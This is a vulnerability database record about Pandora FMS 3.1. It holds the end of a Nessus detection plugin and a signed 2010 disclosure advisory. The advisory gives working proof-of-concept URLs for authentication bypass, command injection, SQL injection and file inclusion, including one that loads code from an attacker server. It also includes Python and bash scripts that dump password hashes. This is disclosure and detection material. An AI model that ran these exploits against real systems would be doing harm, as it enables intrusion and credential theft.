2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"pandora_fms_console_detect.nasl\");\n script_require_keys(\"installed_sw/Pandora FMS\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = 'Pandora FMS';\nget_install_count(app_name:app, exit_if_zero:TRUE);\nport = get_http_port(default:80, php:TRUE);\ninstall = get_single_install(app_name:app, port:port);\n\nuser = 'admin';\nhash = hexstr(MD5(user));\nurl = install['path'] + '/index.php?loginhash_data=' + hash + '&loginhash_user=' + user + '&loginhash=1';\nres = http_send_recv3(method:'GET', item:url, port:port, exit_on_fail:TRUE);\n\nif ('[<b>' + user + '</b>]</a>' >< res[2])\n{\n if (report_verbosity > 0)\n {\n # In vulnerable versions, we'll be able to fingerprint the vulnerability even\n # if we're unable to guess a valid username (the page header indicates we're\n # logged in, but nothing in the console is available). If this happens, we\n # should probably make a note of it\n if (\n 'Welcome to Pandora FMS Web Console</ul>' >!< res[2] ||\n 'Access to this page is restricted to authorized users only' >< res[2]\n )\n {\n trailer =\n 'Nessus attempted to login as \"' + user + '\" which does not appear to be a\\n' +\n 'valid user. This means Nessus was able to verify the vulnerability,\\n' +\n 'but was unable to get unauthorized access to the console.';\n }\n else trailer = NULL;\n\n report =\n 'Nessus was able to verify the issue using the following URL :\\n\\n' +\n ' ' + build_url(qs:url, port:port) + '\\n';\n if (!isnull(trailer)) report += '\\n' + trailer;\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n{\n base = build_url(qs:install['dir'], port:port);\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, base);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nPandora FMS Authentication Bypass and Multiple Input Validation\r\nVulnerabilities\r\n\r\nCVE IDs in this security advisory:\r\n\r\n1&#41; Authentication bypass - CVE-2010-4279\r\n2&#41; OS Command Injection - CVE-2010-4278\r\n3&#41; SQL Injection - CVE-2010-4280\r\n4&#41; Blind SQL Injection - CVE-2010-4280\r\n5&#41; Path Traversal - CVE-2010-4281 - CVE-2010-4282 - CVE-2010-4283\r\n\r\n\r\n[+] Introduction\r\n\r\nPandora FMS &#40;for Pandora Flexible Monitoring System&#41; is a software\r\nsolution for monitoring computer networks. It allows monitoring in a\r\nvisual way the status and performance of several parameters from\r\ndifferent operating systems, servers, applications and hardware systems\r\nsuch as firewalls, proxies, databases, web servers or routers.\r\n\r\nIt can be deployed in almost any operating system. It features remote\r\nmonitoring &#40;WMI, SNMP, TCP. UDP, ICMP, HTTP...&#41; and it can also use\r\nagents. An agent is available for each platform. It can also monitor\r\nhardware systems with a TCP/IP stack, such as load balancers, routers,\r\nnetwork switches, printers or firewalls.\r\n\r\nThis software has several servers that process and get information from\r\ndifferent sources, using WMI for gathering remote Windows information, a\r\npredictive server, a plug-in server which makes complex user-defined\r\nnetwork tests, an advanced export server to replicate data between\r\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\r\nTrap console.\r\n\r\nReleased under the terms of the GNU General Public License, Pandora FMS\r\nis free software.\r\n\r\n\r\n[+] Description and Proof of Concept\r\n\r\n\r\n1&#41; Authentication bypass - CVE-2010-4279 - CVSS: 10/10\r\n\r\nAn attacker could access to any account user, including admin, using the\r\n&quot;hash login&quot; authentication process. This kind of authentication method\r\nworks providing a username and a hash. The issue could be exploited\r\nremotely providing a username and the md5 of it when\r\n$config[&#39;loginhash_pwd&#39;] is empty, that in fact is the default\r\nconfiguration.\r\n\r\nSnippet of vulnerable code in index.php:\r\n\r\n136 // Hash login process\r\n137 if &#40;! isset &#40;$config[&#39;id_user&#39;]&#41; &amp;&amp; isset &#40;$_GET[&quot;loginhash&quot;]&#41;&#41; {\r\n138 $loginhash_data = get_parameter&#40;&quot;loginhash_data&quot;, &quot;&quot;&#41;;\r\n139 $loginhash_user = get_parameter&#40;&quot;loginhash_user&quot;, &quot;&quot;&#41;;\r\n140\r\n141 if &#40;$loginhash_data ==\r\nmd5&#40;$loginhash_user.$config[&quot;loginhash_pwd&quot;]&#41;&#41; {\r\n142 logon_db &#40;$loginhash_user, $_SERVER[&#39;REMOTE_ADDR&#39;]&#41;;\r\n143 $_SESSION[&#39;id_usuario&#39;] = $loginhash_user;\r\n144 $config[&quot;id_user&quot;] = $loginhash_user;\r\n\r\n\r\n\r\nProof of concept:\r\n\r\nhttp://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&amp;loginhash_user=admin&amp;loginhash=1\r\n\r\nGot it! admin! :&#41;\r\n\r\nBy default, any installation of this software allows unauthenticated\r\nattackers to perform an authentication bypass and a privilege escalation\r\nto admin.\r\n\r\n\r\n1.1&#41; Additionally, a manual modification in order to use the hash_hmac\r\nfunction instead of the weak statement md5 &#40; $string . $KEY&#41; is\r\nencouraged for security purposes.\r\n\r\nSnippet of code &#40;index.php, version 3.1.1&#41;:\r\n\r\n145 // Hash login process\r\n&#40;...&#41;\r\n150 if &#40;$config[&quot;loginhash_pwd&quot;] != &quot;&quot; &amp;&amp; $loginhash_data ==\r\nmd5&#40;$loginhash_user.$config[&quot;loginhash_pwd&quot;]&#41;&#41; {\r\n\r\nIn line 150, use\r\nhash_hmac&#40;&quot;sha256&quot;,$loginhash_user,$config[&quot;loginhash_pwd&quot;]&#41;, instead of\r\nmd5&#40;$lioginhash_user.$config[&quot;loginhash_pwd&quot;]&#41;\r\n\r\n\r\n2&#41; OS Command Injection - CVE-2010-4278 - CVSS 9/10\r\n\r\nThe layout parameter in file operation/agentes/networkmap.php is not\r\nproperly filtered and allows an attacker to inject OS commands.\r\n\r\nSnippet of vulnerable code &#40;file operation/agentes/networkmap.php&#41;:\r\n\r\n32 $layout = &#40;string&#41; get_parameter &#40;&#39;layout&#39;, &#39;radial&#39;&#41;;\r\n...\r\n137 $filename_map = $config[&quot;attachment_store&quot;].&quot;/networkmap_&quot;.$layout;\r\n138 $filename_img = &quot;attachment/networkmap_&quot;.$layout.&quot;_&quot;.$font_size;\r\n139 $filename_dot = $config[&quot;attachment_store&quot;].&quot;/networkmap_&quot;.$layout;\r\n...\r\n162 $cmd = &quot;$filter -Tcmapx -o&quot;.$filename_map.&quot; -Tpng\r\n- -o&quot;.$filename_img.&quot; &quot;.$filename_dot;\r\n163 $result = system &#40;$cmd&#41;;\r\n\r\nPoC:\r\n\r\nhttp://servername/pandora_console/index.php?login=1&amp;login=1&amp;sec=estado&amp;sec2=operation/agentes/networkmap&amp;refr=0&amp;layout=1;uname&#37;20-a;\r\nhttp://servername/pandora_console/index.php?login=1&amp;sec=estado&amp;sec2=operation/agentes/networkmap&amp;refr=0&amp;layout=1;id;\r\n\r\nIf we use vulnerability #1 &#40;that permits bypass the authentication\r\nsystem and login as admin&#41; with this issue, the CVSS will be 10/10.\r\n\r\n\r\n3&#41; SQL Injection - CVE-2010-4280 - CVSS 8.5/10\r\n\r\nThe parameter id_group when get_agents_group_json is equal to 1 is\r\nvulnerable to SQL Injection attacks.\r\n\r\nPoC:\r\nhttp://host/pandora_console/ajax.php?page=operation/agentes/ver_agente&amp;get_agents_group_json=1&amp;id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario\r\n\r\n\r\nExploit:\r\n\r\n# Pandora Flexible Monitoring System SQL Injection PoC\r\n# Juan Galiana Lara\r\n# Gets the list of users and password from the database\r\n#\r\n#configure cookie&amp;host before use it\r\n#usage\r\n#python sqlinj_users.py\r\n#admin:75b756ff2785ea8bb9ae02c13b6a71f1\r\n#...\r\n\r\nimport json\r\nimport urllib2\r\n\r\nheaders = {&quot;Cookie&quot;: &quot;PHPSESSID=a4s3nf1tqv2fau8s6qhi6rutp9dahe9o&quot;}\r\n\r\nurl = &quot;http://HOST/pandora_console/ajax.php&quot;\r\nurl+=\r\n&quot;?page=operation/agentes/ver_agente&amp;get_agents_group_json=1&amp;id_group=1&quot;\r\nurl+=\r\n&quot;/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario&quot;\r\n\r\nreq = urllib2.Request&#40;url,headers=headers&#41;\r\nresp = urllib2.urlopen&#40;req&#41;\r\n\r\nusers = json.read&#40;resp.read&#40;&#41;&#41;\r\nfor user in users:\r\n print&#40;user[&quot;id_agente&quot;]+&quot;:&quot;+user[&quot;nombre&quot;]&#41;\r\n\r\n\r\nThe fix to these kind of issues was the implementation of a generic\r\nfilter against sql injection. A proper fix is planned for a major version.\r\n\r\n\r\n4&#41; Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10\r\n\r\nThe parameter group_id of operation/agentes/estado_agente.php is\r\nvulnerable to blind sql injection.\r\n\r\n\r\nPoC:\r\nhttp://host/pandora_console/index.php?sec=estado&amp;sec2=operation/agentes/estado_agente&amp;group_id=24&#37;29&#37;20and&#37;20&#37;28select&#37;20password&#37;20from&#37;20tusuario&#37;20where&#37;20ord&#37;28substring&#37;28password,1,1&#37;29&#37;29=49&#37;20and&#37;20id_user=0x61646d696e&#37;29&#37;20union&#37;20select&#37;20id_agente,&#37;20nombre&#37;20from&#37;20tagente&#37;20where&#37;20id_grupo&#37;20in&#37;20&#37;281\r\n\r\n\r\nExploit:\r\n\r\n#!/bin/bash\r\n# Pandora Flexible Monitoring System Blind SQL Injection PoC\r\n# Juan Galiana Lara\r\n# Gets the md5 hash password from a specific user\r\n#\r\n#configure host,cookie&amp;group_id before use it\r\n#usage\r\n#$ ./getpassword.sh\r\n#74b444ff2785ea8bb9ae02c13b6a71f1\r\n\r\nHOST=&quot;HOST&quot;\r\nTARGET_USER=&quot;0x61646d696e&quot; #admin\r\nPATTERN=&quot;Interval&quot;\r\nCOOKIE=&quot;rq842tci6e5ib7t918c6sv1ml4&quot;\r\nCHARSET=&#40;0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v\r\nw x y z&#41;\r\nGROUP_ID=2\r\n\r\nj=1\r\nwhile [[ $j -lt 33 ]]; do\r\n i=0\r\n while [[ $i -lt ${#CHARSET[@]} ]]; do\r\n c=$&#40;printf &#39;&#37;d&#39; &quot;&#39;${CHARSET[$i]}&quot;&#41;\r\n\r\nURL=&quot;http://$HOST/pandora_console/index.php?sec=estado&amp;sec2=operation/agentes/estado_agente&amp;group_id=$GROUP_ID&#37;29&#37;20and&#37;20&#37;28select&#37;20password&#37;20from&#37;20tusuario&#37;20where&#37;20ord&#37;28substring&#37;28password,$j,1&#37;29&#37;29=$c&#37;20and&#37;20id_user=$TARGET_USER&#37;29&#37;20union&#37;20select&#37;20id_agente,&#37;20nombre&#37;20from&#37;20tagente&#37;20where&#37;20id_grupo&#37;20in&#37;20&#37;281&quot;;\r\n curl $URL --cookie &quot;PHPSESSID=$COOKIE&quot; 2&gt; /dev/null | grep -q\r\n$PATTERN;\r\n if [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi;\r\n let i++\r\n done;\r\n if [[ $i -eq ${#CHARSET[@]} ]]; then echo &quot;Something went wrong!&quot;;\r\nexit 1; fi\r\n let j++;\r\ndone\r\necho\r\nexit 0\r\n\r\n\r\nThe fix to these kind of issues was the implementation of a generic\r\nfilter against sql injection. A proper fix is planned for a major version.\r\n\r\n\r\n5&#41; Path Traversal:\r\n\r\n5.1 - PHP File Inclusion &#40;or RFI/LFI: Remote/Local file inclusion&#41; -\r\nCVE-2010-4281 -CVE-2010-4282 - CVSS 8.5/10\r\n\r\nParameter &#39;page&#39; of ajax.php is not properly sanitizing user-supplied\r\ninput. The function safe_url_extraclean is filtering &#39;:&#39; character, and\r\nit doesn&#39;t allow to use the string &quot;http://&quot; to create urls, but allows\r\n&#39;/&#39; character and an attacker could reference remote resources via\r\nWindows UNC files, using //servername//resource/file\r\n\r\nNote that the first check in safe_url_extraclean is filtering &#39;://&#39;, so\r\nwe can bypass the filter easily doing http://http://url, and it only\r\nstrip the first protocol://. However, the last preg_replace strips the :\r\ncharacter.\r\n\r\nProof of concept:\r\n\r\nUNC: http://servername/pandora_console/ajax.php?page=//server/share/test\r\n\r\nAs well, ajax.php allows to include any php file in the disk\r\n\r\nfilesystem:\r\nhttp://servername/pandora_console/ajax.php?page=../../../../../directory/file\r\n\r\nCharacter &#37;00 is not allowed due safe_url_extraclean function filtering,\r\nand is not possible to include other files distinct that php files, but\r\nstill allows . and / characters.\r\n\r\n\r\n5.2 - PHP File Inclusion &#40;or RFI Remote file inclusion&#41; - CVE-2010-4283\r\n- - CVSS 7.9/10\r\n\r\nAn attacker can inject arbitrary PHP code and execute it remotely due\r\nargv[1] parameter is not filtered in file pandora_diag.php.\r\n\r\nPoC:\r\nhttp://servername/pandora_console/extras/pandora_diag.php?argc=2&amp;argv[1]=http://serverattacker/salsa.php&#37;00\r\n\r\nNote: that issue needs register_globals set to On to be exploitable.\r\n\r\n\r\n5.3 - Path traversal &amp; Local file inclusion vulnerabilities -\r\nCVE-2010-4282 - CVSS 6.8/10\r\n\r\nAn attacker can include arbitrary files of the filesystem via id\r\nparameter in file pandora_help.php.\r\n\r\n\r\nSnippet of vulnerable code:\r\n\r\n 24 $id = get_parameter &#40;&#39;id&#39;&#41;;\r\n 25\r\n 26 /* Possible file locations */\r\n 27 $files = array\r\n&#40;$config[&quot;homedir&quot;].&quot;/include/help/&quot;.$config[&quot;language&quot;].&quot;/help_&quot;.$id.&quot;.php&quot;,\r\n 28\r\n$config[&quot;homedir&quot;].ENTERPRISE_DIR.&quot;/include/help/&quot;.$config[&quot;language&quot;].&quot;/help_&quot;.$id.&quot;.php&quot;,\r\n 29\r\n$config[&quot;homedir&quot;].ENTERPRISE_DIR.&quot;/include/help/en/help_&quot;.$id.&quot;.php&quot;,\r\n 30 $config[&quot;homedir&quot;].&quot;/include/help/en/help_&quot;.$id.&quot;.php&quot;&#41;;\r\n 31 $help_file = &#39;&#39;;\r\n 32 foreach &#40;$files as $file&#41; {\r\n 33 if &#40;file_exists &#40;$file&#41;&#41; {\r\n 34 $help_file = $file;\r\n 35 break;\r\n 36 }\r\n 37 }\r\n...\r\n 62 require_once &#40;$help_file&#41;;\r\n\r\n\r\nProof of concept:\r\n\r\nhttp://servername/pandora_console/general/pandora_help.php?id=/../../../../../../../boot.ini&#37;00\r\n\r\nThis code is platform dependent bug, you can read more at\r\nhttp://seclists.org/fulldisclosure/2010/Jul/137\r\nOnly works in windows systems, an attacker can include local file using\r\n../ characters due parameter id is not filtered\r\nIf magic_quotes_gpc is Off, arbitrary files can be included, like\r\nboot.ini using NULL character &#40;&#37;00&#41;, if not, only php files are allowed\r\n\r\n\r\n5.4 - Path traversal &amp; Arbitrary write and delete files - CVE-2010-4282\r\n- - CVSS 8.0/10\r\n\r\nIn file operation/agentes/networkmap.php the &#39;layout&#39; parameter is\r\nhandled in an insecure way and it is used to write and delete files on\r\nthe filesystem.\r\nAn attacker could use this parameter to write in arbitrary paths and\r\neven remove files.\r\n\r\nSnippet of vulnerable code:\r\n\r\n32 $layout = &#40;string&#41; get_parameter &#40;&#39;layout&#39;, &#39;radial&#39;&#41;;\r\n...\r\n137 $filename_map = $config[&quot;attachment_store&quot;].&quot;/networkmap_&quot;.$layout;\r\n138 $filename_img = &quot;attachment/networkmap_&quot;.$layout.&quot;_&quot;.$font_size;\r\n139 $filename_dot = $config[&quot;attachment_store&quot;].&quot;/networkmap_&quot;.$layout;\r\n...\r\n157 $fh = @fopen &#40;$filename_dot, &#39;w&#39;&#41;;\r\n158 if &#40;$fh === false&#41; {\r\n159 $result = false;\r\n160 } else {\r\n161 fwrite &#40;$fh, $graph&#41;;\r\n162 $cmd = &quot;$filter -Tcmapx -o&quot;.$filename_map.&quot; -Tpng\r\n- -o&quot;.$filename_img.&quot; &quot;.$filename_dot;\r\n163 $result = system &#40;$cmd&#41;;\r\n164 fclose &#40;$fh&#41;;\r\n165 unlink &#40;$filename_dot&#41;;\r\n166 }\r\n...\r\n178 require &#40;$filename_map&#41;;\r\n\r\n\r\nCharacter sequences &#39;../&#39; could be used to write files &#40;due -o parameter\r\nin lines 162 and 163&#41;, as well as potentially remove files &#40;line 157,\r\n161 and 165&#41; or include them &#40;line 178&#41;\r\nAs well like in 5.3 this issue is only exploitable in windows\r\nenvironments because the same reason.\r\n\r\n\r\n[+] Impact\r\n\r\nAn attacker can execute commands of the operating system, inject remote\r\ncode in the context of the application, get arbitrary files from the\r\nfilesystem or extract any data of the database including passwords and\r\nconfidential information about the monitored network/systems. Also it is\r\npossible to bypass the authentication or scale privileges to became\r\nadmin, gaining full control of the web application and web server. These\r\nvulnerabilities have a high impact to the confidentiality, integrity,\r\nand availability of the system.\r\n\r\n\r\n[+] Systems affected\r\n\r\nVersions prior and including 3.1 of Pandora FMS are affected\r\n\r\n\r\n[+] Solution\r\n\r\nApply the security fix for version 3.1:\r\nhttp://sourceforge.net/projects/pandora/files/Pandora&#37;20FMS&#37;203.1/Final&#37;20version&#37;20&#37;28Stable&#37;29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\r\n\r\n\r\nOr upgrade to version 3.1.1 from\r\nhttp://sourceforge.net/projects/pandora/files/Pandora&#37;20FMS&#37;203.1/3.1.1/\r\n\r\n\r\n[+] Timeline\r\n\r\nAgo 2010: First contact to vendor\r\nAgo 2010: Confirmation of vendor\r\nSept 2010: Second contact: SQL Injection vulnerabilities\r\nSept 2010: Confirmation that the fix will be released on October\r\nOct 2010: PandoraFMS security patch for 3.1 version released\r\nOct 2010: Request for CVE numbers\r\nNov 2010: PandoraFMS version 3.1.1 released\r\nNov 2010: Disclosure of this advisory\r\n\r\n\r\n[+] References\r\n\r\nOfficial PandoraFMS site: http://pandorafms.org/\r\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\r\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\r\nCommon Vulnerability Scoring System &#40;CVSS&#41; v2 calculator:\r\nhttp://nvd.nist.gov/cvss.cfm?calculator&amp;adv&amp;version=2\r\nCommon Vulnerabilities and Exposures &#40;CVE&#41;: http://cve.mitre.org/\r\n\r\n\r\n[+] Credits\r\n\r\nThese vulnerabilities has been discovered by Juan Galiana Lara -\r\n@jgaliana - http://juangaliana.blogspot.com/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 &#40;GNU/Linux&#41;\r\n\r\niQIcBAEBAgAGBQJM9NIMAAoJEJaV5RMdiDI75QEP/jc/7zYJCFUTCCzfbVEOgECp\r\n//N5GUaV/TdIVCDcGKu+/09kbDewhU/hwcxNEH7H1EC80Xv2qx1gkrvcHiDsbITY\r\nsCrMd2JfOsT2xAFPYbuiD5QLvDcqjSj/rgVxjJFvMfe21HjYq7JmPl48jY9pvhXL\r\n8zG6qarJ6lKD+pSfhFeI3OgZiNF0Ws5yzh3Byq4aeRcIGWzLahYZ7upyHnAsDon8\r\nb8EqZao0gKvkWVZHEPm13WtLfZvwly6KhBkmgfaALJVO4WZ7dEHyy6/obokaYzgc\r\nnMA2ZiTyhXTTNlRtcFvbvU5clglu1eZr/hnEvi4L7UIGg00HkdqqiDMl6JmX6QWi\r\nClUihkcSMxfgndDYib1Xebhghe+T6w0GLbUi40A40ByOrGAdU8UF6bo4Mh8EIgkX\r\nQrWR6M/nr+3GRf+LWgekKozqqFQNDQFeYq5qv16jGRiqO+Rn9yFjlqcjGY0Qx6DO\r\nzVY23OaXXjYkNIfHO+HX4pVhyomrg/oa9rLfjzx8tEieRTZDPDgyn33LP11IzE61\r\nJN8T77VhuwkkYf1v6kzqvbzqNmkTslvk1PR38HUCGY+Sm6pejUsVyIWnt2goqprW\r\ntzbnxGOqmDHFfQ66F0HZkvY8eR0BRuaYZnYNSbzf65F0WmLh6usFOZfrWaZ9baSG\r\nPee6VRKILvel2NRtvF+3\r\n=Adj0\r\n-----END PGP SIGNATURE-----", "modified": "2010-12-01T00:00:00", "published": "2010-12-01T00:00:00", "id": "SECURITYVULNS:DOC:25206", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25206", "title": "Pandora FMS Authentication Bypass and Multiple Input Validation Vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:39", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2010-12-01T00:00:00", "published": "2010-12-01T00:00:00", "id": "SECURITYVULNS:VULN:11274", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11274", "title": "Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}